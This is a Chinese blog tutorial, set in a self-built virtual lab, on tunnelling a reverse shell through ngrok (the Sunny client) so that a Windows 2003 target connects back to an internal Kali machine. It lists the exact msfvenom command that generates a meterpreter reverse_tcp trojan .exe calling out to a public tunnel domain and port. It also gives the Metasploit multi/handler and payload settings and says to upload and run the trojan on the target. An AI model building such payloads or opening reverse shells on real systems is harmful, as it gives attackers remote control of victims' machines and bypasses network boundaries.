内网kali 通过ngrok穿透反弹shell

1、在ngrok注册账号,并且开通免费隧道(点击下载)

   这里我kali的内网ip地址是10.10.10.131

2、.下载Ngrok客户端 (地址https://www.ngrok.cc/download.html)

解压后上传至kali 或者传到kali后unzip 命令进行解压 得到一个sunny文件

3、启动sunny

  ./sunny  clientid 隧道id

如上图说明启动成功

4、目标机 ip地址192.168.43.170(win2003)  kali 10.10.10.131(这里是我通过虚拟机配置的内外网环境)

即目标机无法ping通kali   kali可以ping通目标机  即kali处于内网 验证如下图

5、kali端配置木马

   Msfvenom -p windows/meterpreter/reverse_tcp LHOST=free.idcfengye.com LPORT=10326 -f exe -o /root/Desktop/puty.exe   (生成木马)

LHOST 为赠送的域名

LPORT 为远程端口号

6、启动msf配置Exploit模块

   Use exploit/multi/handler

7、选择攻击载荷

   Set payload windows/meterpreter/reverse_tcp

 

执行run 或许exploit

注意这里的ip地址和端口号,不要和前面的搞混了

上传之前生成的木马并且执行

已经成功将shell反弹到我们的内网kali

第二种内网穿透方式,也是我平时用的比较多的一种见连接

https://blog.csdn.net/u010025272/article/details/127101003

 

  • 9
    点赞
  • 61
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 12
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 12
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

丢了少年失了心1

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值